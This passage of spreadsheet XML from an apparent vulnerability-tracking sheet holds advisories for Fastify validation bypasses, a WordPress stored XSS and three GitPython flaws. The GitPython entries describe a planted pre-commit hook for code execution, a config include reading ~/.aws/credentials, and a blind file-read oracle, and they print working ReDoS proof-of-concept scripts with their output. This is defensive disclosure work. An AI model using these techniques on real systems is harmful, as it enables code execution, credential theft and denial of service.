Fixed in 1.96.2, 1.95.1, 1.94.3, 1.93.2, 1.92.2, 1.91.5, 1.90.7, 1.89.7, and 1.88.6.
### Workarounds
Set `general_settings.allow_client_side_credentials` to `false` so callers cannot override connection parameters, restrict proxy keys to trusted callers, and block the affected parameters (`api_base`, `base_url`, `model_list`, `fallbacks`, provider credential fields) at a reverse proxy or API gateway.</t>
        </is>
      </c>
      <c r="T201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84377</t>
        </is>
      </c>
    </row>
    <row r="202">
      <c r="A202" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B202" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84428</t>
        </is>
      </c>
      <c r="D202" s="5" t="inlineStr"/>
      <c r="E202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F202" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G202" s="5" t="inlineStr"/>
      <c r="H202" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I202" s="5" t="inlineStr"/>
      <c r="J202" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K202" s="5" t="inlineStr"/>
      <c r="L202" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M202" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N202" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O202" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P202" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q202" s="5" t="inlineStr"/>
      <c r="R202" s="5" t="inlineStr"/>
      <c r="S202" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify lowercases header-schema property names before compiling the schema, because Node.js stores request header names in lowercase. That normalization was incomplete: it lowercased only top-level `properties` keys and the root `required` array, and did not lowercase the JSON Schema Draft 7 `dependencies` keyword (its trigger keys and dependent property names) or names in nested subschemas. As a result, a header schema that uses `dependencies` to require one header when another is present (for example `X-Admin` requiring `X-Admin-Token`) never matches the lowercased request headers, so the dependency assertion is silently skipped. An unauthenticated remote client can send the header that activates a privileged path while omitting the header the dependency was meant to require, bypassing a schema-enforced security control. The header schema is idiomatic, valid JSON Schema Draft 7, and no custom validator, malformed request, or misconfiguration is required.
### Patches
Header-schema names are now normalized across all schema positions (`properties`, `required`, `dependencies`, `dependentRequired`, `dependentSchemas`, and nested subschemas). Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release. Header schemas referenced through an external shared `$ref` (registered with `addSchema`) are not reached by this normalization and now emit an `FSTSEC002` startup warning; inline the header schema to keep case-insensitive assertions in effect.
### Workarounds
If upgrading is not immediately possible, write header-schema names in lowercase so the `dependencies` and other case-sensitive assertions match Node's lowercased request headers, or enforce the cross-header requirement in an `onRequest` or `preValidation` hook instead of the schema.</t>
        </is>
      </c>
      <c r="T202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84428</t>
        </is>
      </c>
    </row>
    <row r="203">
      <c r="A203" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B203" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84469</t>
        </is>
      </c>
      <c r="D203" s="5" t="inlineStr"/>
      <c r="E203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F203" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G203" s="5" t="inlineStr"/>
      <c r="H203" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I203" s="5" t="inlineStr"/>
      <c r="J203" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K203" s="5" t="inlineStr"/>
      <c r="L203" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M203" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N203" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O203" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P203" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q203" s="5" t="inlineStr"/>
      <c r="R203" s="5" t="inlineStr"/>
      <c r="S203" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify decided whether to validate a request part by checking its schema for JavaScript truthiness. JSON Schema Draft 7 defines the boolean `false` as a valid schema that rejects every instance, but because `false` is falsy, a route that set `body`, `querystring`, `params`, or `headers` to `false` had that part left uncompiled: no validator was attached and the request reached the handler. An application that used `false` as a deny-all schema to make a route unreachable was therefore fully bypassed, and an unauthenticated remote client could reach the handler with any input. The same applied to the documented `query` alias for `querystring`. This is a complete bypass rather than a weak-schema issue, since `false` is the strongest JSON Schema assertion and must always fail.
### Patches
Request-part schemas are now selected by an explicit presence check rather than truthiness, so a boolean `false` (or `true`) schema is compiled and enforced, including through the `query` alias. Patched in fastify `5.12.2`. The fix is also included in the `6.0.0` release.
### Workarounds
If upgrading is not immediately possible, express a deny-all request schema with an always-failing object schema instead of the boolean `false` (for example `{ "not": {} }`), or reject the request in an `onRequest` hook.</t>
        </is>
      </c>
      <c r="T203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84469</t>
        </is>
      </c>
    </row>
    <row r="204">
      <c r="A204" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B204" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84504</t>
        </is>
      </c>
      <c r="D204" s="5" t="inlineStr"/>
      <c r="E204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F204" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G204" s="5" t="inlineStr"/>
      <c r="H204" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I204" s="5" t="inlineStr"/>
      <c r="J204" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K204" s="5" t="inlineStr"/>
      <c r="L204" s="5" t="inlineStr">
        <is>
          <t>npm:fastify</t>
        </is>
      </c>
      <c r="M204" s="5" t="inlineStr">
        <is>
          <t>5.12.2</t>
        </is>
      </c>
      <c r="N204" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O204" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P204" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q204" s="5" t="inlineStr"/>
      <c r="R204" s="5" t="inlineStr"/>
      <c r="S204" s="5" t="inlineStr">
        <is>
          <t>### Impact
Fastify runs a route's validator and, for a result shaped like `{ value, error }`, unwraps it: an `error` becomes a validation failure and `value` replaces the request part. This convention is intended for synchronous custom compilers (for example Joi). A JSON Schema `$async` validator, however, resolves with the validated data itself, so Fastify applied the same unwrapping to it. If a request part validated by an `$async` schema contains a `value` property, Fastify replaced the whole request part with that nested value before the handler ran, so a `value` or `error` property in the payload was attacker-controlled. An application that dispatches operations from the validated request body could then act on data that never satisfied the route schema, leading to unauthorized state changes or disclosure. Reaching the vulnerable path requires the route to use an `$async` request schema.
### Patches
Fastify no longer treats an asynchronous validation result as a `{ value, error }` wrapper: an async validator's resolved value is used only to determine pass or fail, and it can no longer replace the request part or inject an error. The synchronous custom-compiler contract is unchanged. Patched in fastify `5.12.2` and `6.0.0`.
### Workarounds
If upgrading is not immediately possible, avoid `$async` request schemas, or perform the security-sensitive check in an `onRequest` or `preHandler` hook rather than relying on the schema-validated request part. Custom async validator compilers should signal failure by throwing (rejecting) rather than returning an `{ error }` object.</t>
        </is>
      </c>
      <c r="T204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84504</t>
        </is>
      </c>
    </row>
    <row r="205">
      <c r="A205" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B205" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86610</t>
        </is>
      </c>
      <c r="D205" s="5" t="inlineStr"/>
      <c r="E205" s="5" t="inlineStr"/>
      <c r="F205" s="5" t="inlineStr"/>
      <c r="G205" s="5" t="inlineStr"/>
      <c r="H205" s="5" t="inlineStr"/>
      <c r="I205" s="5" t="inlineStr"/>
      <c r="J205" s="5" t="inlineStr">
        <is>
          <t>php, gin, hp</t>
        </is>
      </c>
      <c r="K205" s="5" t="inlineStr"/>
      <c r="L205" s="5" t="inlineStr"/>
      <c r="M205" s="5" t="inlineStr"/>
      <c r="N205" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O205" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P205" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q205" s="5" t="inlineStr"/>
      <c r="R205" s="5" t="inlineStr"/>
      <c r="S205" s="5" t="inlineStr">
        <is>
          <t>The Download Manager WordPress plugin before 3.3.71 does not sufficiently sanitise and escape a package setting before outputting it back in a page, which could allow users with the Author role and above to perform Stored Cross-Site Scripting attacks against any visitor who opens the package's download dialogue, including administrators. Only sites running PHP below 8.1 are affected, as the sanitisation applied when the setting is saved does not neutralise single quotes there.</t>
        </is>
      </c>
      <c r="T205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86610</t>
        </is>
      </c>
    </row>
    <row r="206">
      <c r="A206" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B206" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87817</t>
        </is>
      </c>
      <c r="D206" s="5" t="inlineStr"/>
      <c r="E206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F206" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G206" s="5" t="inlineStr"/>
      <c r="H206" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I206" s="5" t="inlineStr"/>
      <c r="J206" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K206" s="5" t="inlineStr"/>
      <c r="L206" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M206" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N206" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O206" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P206" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q206" s="5" t="inlineStr"/>
      <c r="R206" s="5" t="inlineStr"/>
      <c r="S206" s="5" t="inlineStr">
        <is>
          <t>### Summary
`Repo.__init__` decides which directory is the git directory by testing candidate paths in an order that
considers the real `.git` **last**. Two earlier tests can be satisfied by ordinary tracked files. Git
reserves only the literal name `.git`, so `HEAD`, `objects/`, `refs/`, `config`, `gitdir`, `commondir`
and `hooks/` at a repository root are all legal tracked content.
Consequently, after a victim opens or clones an attacker's repository, GitPython resolves `git_dir` to
the **working-tree root** while real git correctly resolves `&lt;root&gt;/.git`. Everything GitPython then
treats as "inside the git directory" is attacker-authored content — including `hooks/`, which it
executes.
### CVE-2026-87817
### Affected code (3.1.59)
The discovery loop in `git/repo/base.py` tests, in order:
1. `git/repo/base.py:299` — `isfile(curpath/gitdir)` **and** `isfile(curpath/commondir)` **and** `isfile(curpath/HEAD)`
2. `git/repo/base.py:320` — `is_git_dir(curpath)`
3. `git/repo/base.py:341` — `dotgit = osp.join(curpath, ".git")` ← the real git dir, considered last
`is_git_dir` (`git/repo/fun.py:60`) requires only that `objects/` and `refs/` are directories and that
`HEAD` is a file; **`HEAD`'s contents are never parsed.** The hook path is resolved from
`index.repo.git_dir` (`git/index/fun.py:73`), i.e. the mis-resolved directory.
### Proof of concept
Requires only `pip install GitPython==3.1.59`. Full script attached as `poc1_rce.py`; it runs entirely
in a temp directory and the payload only writes a marker file.
Attacker repository — four ordinary tracked files at the root:
| path | mode | content |
|---|---|---|
| `gitdir` | 100644 | `.git\n` |
| `commondir` | 100644 | `.git\n` |
| `HEAD` | 100644 | `ref: refs/heads/master\n` |
| `hooks/pre-commit` | **100755** | `#!/bin/sh` + payload |
Victim — two ordinary calls:
```python
repo = git.Repo.clone_from(url, dst)     # or git.Repo(dst)
repo.index.commit("automated commit")    # code execution happens here
```
Observed on the PyPI release 3.1.59 (Linux and Windows):
```
real git says the git dir is : /tmp/.../victim/.git
GitPython says it is         : /tmp/.../victim      &lt;- shadowed
attacker's hook executed     : True
git fsck                     : (clean)
```
The `pre-commit` hook runs at `git/index/base.py:1201`, before `write_tree()`, so it fires even though
the commit later fails.
### Impact
A service that opens or clones an untrusted repository with GitPython — a CI runner building a fork
pull request, a code-scanning/SBOM service, a mirror, a dependency bot, an AI code-review/agent tool —
can be made to:
1. **Execute arbitrary commands** via the tracked `&lt;root&gt;/hooks/pre-commit` when the victim calls
   `index.commit()`.
2. **Read files outside the repository**: the tracked `&lt;root&gt;/config` becomes the repository config and
   is parsed with `merge_includes=True` (`git/repo/base.py:765`), so `[include] path = ~/.aws/credentials`
   discloses the file. (`Repo._config_reader` still defaults `merge_includes=True`, so the hardening
   added in 3.1.59 for `.gitmodules`/GHSA-7833 does not cover this path.)
3. **Write a config file to an attacker-chosen directory** via an absolute tracked `commondir`.
Delivery is silent: `git clone` exits 0, `git fsck` (including `--strict`, and with
`transfer.fsckObjects`/`fetch.fsckObjects=true`) reports nothing, and the clone passes every read-only
probe (`head.commit`, `branches`, `is_dirty()`, `untracked_files`, `iter_commits`) because a tracked
`commondir` of `.git` pins `common_dir` to the real `.git`.
### Threat model / preconditions
- Attacker controls the content of a repository the victim opens or clones with GitPython (public repo,
  fork PR, mirrored dependency).
- For code execution, the victim performs a commit via GitPython's native `index.commit()`. For the
  file-read impact, opening the repo and reading config is enough.
- `GIT_WORK_TREE` is **not** a mitigation — `git_dir` is assigned and the discovery loop breaks before
  the environment is consulted.
- Real git is unaffected; only GitPython mis-resolves the directory.
### Remediation
1. Test `curpath/.git` **before** the `gitdir`/`commondir`/`HEAD` triple and before `is_git_dir(curpath)`.
2. Resolve `hook_path` / `_commit_hook_path` / `_get_validated_reflog_path` through `repo.common_dir`.
3. Containment-check `commondir`/`gitdir` contents before joining (reuse
   `SymbolicReference._get_validated_path`).
4. Validate `HEAD` in `is_git_dir` (require `ref: refs/...` or a 40-hex sha).
5. Pass `merge_includes=False` in `Repo._config_reader` (`git/repo/base.py:765`).
### Note for the maintainers
Commit `406b98e1` (2026-05-31, "respect core.hooksPath for commit hooks") resolved the hook path via
`git rev-parse --git-path`, which is immune because git rediscovers the true `.git`. Commit `9bc287a2`
(2026-07-20) reverted it to avoid an unconditional `rev-parse` dependency — reintroducing the exec step.
Measured at each commit with the healthy-looking layout: `406b98e1` → hook did not fire; `9bc287a2` …
`3.1.59` → hook fired.
### Scope note
Only the **repository-root** case is reported: where a real `.git` exists, git prefers it, and GitPython
does not. A fake git dir in a subdirectory fools real git too, so that variant is out of scope as a
general ecosystem hazard rather than a GitPython defect.
###POC Files :
[poc1_rce.py](https://github.com/user-attachments/files/31388464/poc1_rce.py)
[poc2_file_read.py](https://github.com/user-attachments/files/31388465/poc2_file_read.py)</t>
        </is>
      </c>
      <c r="T206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87817</t>
        </is>
      </c>
    </row>
    <row r="207">
      <c r="A207" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B207" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87818</t>
        </is>
      </c>
      <c r="D207" s="5" t="inlineStr"/>
      <c r="E207" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F207" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G207" s="5" t="inlineStr"/>
      <c r="H207" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I207" s="5" t="inlineStr"/>
      <c r="J207" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K207" s="5" t="inlineStr"/>
      <c r="L207" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M207" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N207" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O207" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P207" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q207" s="5" t="inlineStr"/>
      <c r="R207" s="5" t="inlineStr"/>
      <c r="S207" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython 3.1.59 blocks a previously available local-file read path through unsafe git diff options such as -O/--orderfile.
However, the high-level diff API still permits --no-index with the default allow_unsafe_options=False.
--no-index changes the semantics of the paths arguments: instead of repository-relative pathspecs, Git interprets them as arbitrary filesystem paths.
When combined with the still-allowed -I/--ignore-matching-lines option, this creates a content-dependent Boolean oracle over a caller-selected local file.
This was reproduced against the published GitPython 3.1.59 wheel.
The original unsafe-option path is blocked in 3.1.59, while this alternate path remains reachable without setting allow_unsafe_options=True.
### Details
Confirmed API surface:
repo.index.diff(
    None,
    no_index=True,
    I=pattern,
    paths=[baseline_path, target_path],
    create_patch=True,
)
The relevant behavior is:
1. --no-index makes the two values supplied via paths filesystem operands rather than repository pathspecs.
2. -I/--ignore-matching-lines makes Git's result depend on whether the supplied regular expression matches the relevant file content.
3. GitPython exposes the resulting bit through distinguishable behavior:
   - matching condition: normal return with an empty DiffIndex
   - non-matching condition: GitCommandError with exit status 1
An application that forwards attacker-influenced diff options and paths and exposes the success/error distinction can therefore be queried repeatedly to recover a guessable local single-line secret.
The issue was confirmed with the default allow_unsafe_options=False.
The behavior does not require the caller to explicitly opt into GitPython's unsafe-option mode.
Verified intended security boundary:
- GitPython 3.1.58 accepts the earlier -O/--orderfile local-file input path.
- GitPython 3.1.59 rejects that same path with UnsafeOptionError.
- GitPython 3.1.59 still permits the --no-index alternate path described above.
This appears to be an alternate route to the same local-file confidentiality property that the 3.1.59 diff option hardening is intended to protect.
### PoC
A minimal reproducer, controlled extraction demonstrator, proof matrix, and proposed remediation are included in the attached package.
[gitpython-3159-maintainer-evidence.zip](https://github.com/user-attachments/files/31123571/gitpython-3159-maintainer-evidence.zip)
The minimal reproducer creates only temporary researcher-controlled files and demonstrates the following predicate:
correct prefix   -&gt; normal GitPython return
incorrect prefix -&gt; GitCommandError(status=1)
In the controlled extraction test, I generated three independent random single-line values and recovered all three exactly through repeated calls to the GitPython high-level API.
Result: 3/3 recovered.
The extraction harness also installs a Python audit hook that rejects direct Python open() access to the target file during the oracle phase. The content-dependent read is therefore performed by the child git process invoked through GitPython rather than by the reproduction script directly.
Controls were also tested:
- normal repository-scoped diff: no secret disclosure
- same outside paths without --no-index: no arbitrary-filesystem interpretation
- deliberately incorrect predicate: status 1 as expected
Suggested remediation is to classify --no-index as unsafe for the high-level diff API unless the caller explicitly sets allow_unsafe_options=True.
### Impact
Potential impact is disclosure of local files readable by the process running GitPython.
Exploitation requires an embedding application to allow an attacker to influence:
1. the relevant diff options,
2. both path operands, and
3. repeated requests while exposing a distinguishable success/error result.
The demonstrated attack is a blind content oracle rather than a one-request in-band file read. It is particularly applicable to short or structured single-line secrets where the target path and approximate value format are known or guessable.
Confirmed affected release: GitPython 3.1.59.</t>
        </is>
      </c>
      <c r="T207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87818</t>
        </is>
      </c>
    </row>
    <row r="208">
      <c r="A208" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B208" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87819</t>
        </is>
      </c>
      <c r="D208" s="5" t="inlineStr"/>
      <c r="E208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F208" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G208" s="5" t="inlineStr"/>
      <c r="H208" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I208" s="5" t="inlineStr"/>
      <c r="J208" s="5" t="inlineStr">
        <is>
          <t>pypi, python</t>
        </is>
      </c>
      <c r="K208" s="5" t="inlineStr"/>
      <c r="L208" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M208" s="5" t="inlineStr">
        <is>
          <t>3.1.60</t>
        </is>
      </c>
      <c r="N208" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P208" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q208" s="5" t="inlineStr"/>
      <c r="R208" s="5" t="inlineStr"/>
      <c r="S208" s="5" t="inlineStr">
        <is>
          <t>### Summary
GitPython's `Actor.name_email_regex` regular expression (`git/util.py`, line 863)
is vulnerable to catastrophic backtracking (ReDoS — Regular Expression Denial of
Service). When GitPython parses the `author` or `committer` header of a git commit
object that contains a long string with an unterminated `&lt;` (no matching `&gt;`), the
Python regex engine enters quadratic backtracking, causing complete single-threaded
CPU exhaustion proportional to the square of the input length.
A single crafted commit object can block any GitPython API call that reads
`.author` or `.committer` for **over two minutes per invocation**, enabling denial
of service against CI runners, code-hosting backends, repository-scanning
pipelines, or any service that processes commits from third-party or untrusted
repositories.
---
### Details
**Vulnerable file and line:**
`git/util.py`, line 863:
```python
name_email_regex = re.compile(r"(.*) &lt;(.*?)&gt;")
```
This regex is evaluated inside `Actor._from_string()` (line 909) every time
GitPython resolves a commit's `.author` or `.committer` property.
**Full call chain — from public API to vulnerable sink:**
commit.author # any ordinary GitPython API call
└── git/objects/commit.py:917
Commit._deserialize()
└── git/objects/util.py:341
parse_actor_and_date(author_line)
└── git/util.py:909
Actor._from_string(string)
└── Actor.name_email_regex.search(string) ← VULNERABLE
`author_line` is decoded directly from the raw bytes of the git commit object with
**no length limit, character restriction, or timeout** applied at any point before
reaching the regex engine. The same chain is triggered by:
- `commit.author`
- `commit.committer`
- `repo.iter_commits()`
- `repo.blame()`
- Any web service / CI tool that displays or processes commit metadata
**Why this pattern backtracks catastrophically:**
The pattern `(.*) &lt;(.*?)&gt;` contains an unbounded greedy group `(.*)` followed by
a literal space and `&lt;`. When the input is a long string that contains `&lt;` but no
closing `&gt;`, the regex engine must try every possible split position for the greedy
group — O(n²) candidate positions for a string of length n — each of which then
drives the inner lazy group into further sub-match attempts. This is the
well-documented "catastrophic backtracking" failure mode for this family of
patterns.
**Empirically measured scaling (tested against GitPython 3.1.59, commit 52a6cba):**
| Author field length (bytes) | Time to resolve `.author` |
|-----------------------------|--------------------------|
| 1,000  | 0.0035 s |
| 5,000  | 0.084 s  |
| 10,000 | 0.341 s  |
| 20,000 | 1.525 s  |
| 40,000 | 5.963 s  |
| 60,000 | 13.360 s |
| 80,000 | 23.871 s |
| **200,000** | **150.488 s** |
Each doubling of input size roughly quadruples processing time (e.g. 40,000 →
80,000 bytes: 5.96 s → 23.87 s ≈ 4.0×), confirming O(n²) growth. Git itself
imposes **no practical size limit** on author name fields in the object format.
**How the malicious object reaches a victim:**
The PoC creates the commit object as a correctly SHA-1-hashed, zlib-compressed git
loose object written directly into `.git/objects/`. `git cat-file -t &lt;sha&gt;` confirms
it is a valid `commit` type and git's own read-side tools display it without error.
Only git's write-side tooling (`git commit --author`, `git update-index`,
explicit `git fsck`) applies the sanity checks that would reject a malformed author
line. Delivery paths that bypass those checks include:
- A git server with `receive.fsckObjects = false` (common in self-hosted deployments)
- A `.git` directory shipped as a tarball, backup, or zip archive
- A git bundle file
- Any automated mirror or import tool that operates at the object level
---
### PoC
**Environment used for testing:**
- GitPython 3.1.59, installed in editable mode from source (no code modifications)
- Python 3.12.3, git 2.43.0, Ubuntu 24.04
**Script 1 — craft the malicious repository (`craft_malicious_repo.py`):**
```python
#!/usr/bin/env python3
"""
Creates a git repository with one commit whose 'author' field is a large
string containing an unterminated '&lt;'. Bypasses git's write-side sanity
checks by writing the raw object directly into .git/objects/.
Usage: python3 craft_malicious_repo.py &lt;target_dir&gt; &lt;payload_size_bytes&gt;
"""
import hashlib, os, subprocess, sys, zlib
def run(cmd, cwd):
    return subprocess.run(cmd, cwd=cwd, check=True, capture_output=True, text=True)
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;target_dir&gt; &lt;payload_size_bytes&gt;")
        sys.exit(1)
    target_dir, payload_size = sys.argv[1], int(sys.argv[2])
    os.makedirs(target_dir, exist_ok=True)
    run(["git", "init", "--quiet"], cwd=target_dir)
    run(["git", "config", "user.email", "poc@example.com"], cwd=target_dir)
    run(["git", "config", "user.name", "PoC"], cwd=target_dir)
    with open(os.path.join(target_dir, "README.txt"), "w") as f:
        f.write("GitPython ReDoS PoC repository\n")
    run(["git", "add", "README.txt"], cwd=target_dir)
    tree_sha = run(["git", "write-tree"], cwd=target_dir).stdout.strip()
    malicious_name = "A" * payload_size
    # Key: author field contains a '&lt;' with no closing '&gt;'
    author_line    = f"author {malicious_name} &lt;unterminated 1691999972 -0700"
    committer_line = "committer PoC &lt;poc@example.com&gt; 1691999972 -0700"
    message        = "ReDoS PoC commit"
    commit_content = (
        f"tree {tree_sha}\n{author_line}\n{committer_line}\n\n{message}\n"
    ).encode()
    header     = f"commit {len(commit_content)}\x00".encode()
    store      = header + commit_content
    sha        = hashlib.sha1(store).hexdigest()
    compressed = zlib.compress(store)
    objdir = os.path.join(target_dir, ".git", "objects", sha[:2])
    os.makedirs(objdir, exist_ok=True)
    with open(os.path.join(objdir, sha[2:]), "wb") as f:
        f.write(compressed)
    run(["git", "update-ref", "refs/heads/master", sha], cwd=target_dir)
    print(f"Malicious commit sha : {sha}")
    print(f"Payload size         : {payload_size} bytes")
    verify = subprocess.run(
        ["git", "cat-file", "-t", sha],
        cwd=target_dir, capture_output=True, text=True
    )
    print(f"git cat-file -t confirms: {verify.stdout.strip()}")
if __name__ == "__main__":
    main()
```
**Script 2 — trigger the vulnerability (`trigger_redos.py`):**
```python
#!/usr/bin/env python3
"""
Opens the repository with GitPython and times commit.author access,
which triggers Actor._from_string() -&gt; Actor.name_email_regex.search().
Usage: python3 trigger_redos.py &lt;repo_dir&gt; &lt;commit_sha&gt;
"""
import sys, time, git
def main():
    if len(sys.argv) != 3:
        print(f"usage: {sys.argv[0]} &lt;repo_dir&gt; &lt;commit_sha&gt;")
        sys.exit(1)
    repo   = git.Repo(sys.argv[1])
    commit = repo.commit(sys.argv[2])
    print("Accessing commit.author — triggers Actor._from_string()...")
    t0     = time.time()
    author = commit.author          # ← this single line causes the hang
    elapsed = time.time() - t0
    print(f"Author name length : {len(author.name)} chars")
    print(f"Elapsed            : {elapsed:.3f} seconds")
    print("RESULT: VULNERABLE" if elapsed &gt; 5 else "RESULT: not triggered")
if __name__ == "__main__":
    main()
```
**Execution and observed output:**
$ python3 craft_malicious_repo.py /tmp/victim-repo 200000
Malicious commit sha : 2450fbd5ab5ebfff430dab183d25678df9fd20de
Payload size : 200000 bytes
git cat-file -t confirms: commit
$ python3 trigger_redos.py /tmp/victim-repo 2450fbd5ab5ebfff430dab183d25678df9fd20de
Accessing commit.author — triggers Actor._from_string()...
Author name length : 200014 chars
Elapsed : 150.488 seconds
RESULT: VULNERABLE
**Docker reproduction (fully isolated environment):**
```bash
docker run --rm -it -v ~/gitpython-poc:/work -w /work python:3.8-bookworm bash
# Inside the container:
apt-get update &amp;&amp; apt-get install -y git
git clone --depth 1 https://github.com/gitpython-developers/GitPython.git /work/GitPython
pip install -e /work/GitPython
python3 /work/poc/craft_malicious_repo.py /work/victim-repo 200000
# note the SHA printed, then:
python3 /work/poc/trigger_redos.py /work/victim-repo &lt;SHA&gt;
```
The `python:3.8-bookworm` base image matches the one used in GitPython's own
`fuzzing/local-dev-helpers/Dockerfile`.
---
### Impact
**Who is affected:**
Any application that uses GitPython to parse commits from a source it does not
fully control. High-risk deployments include:
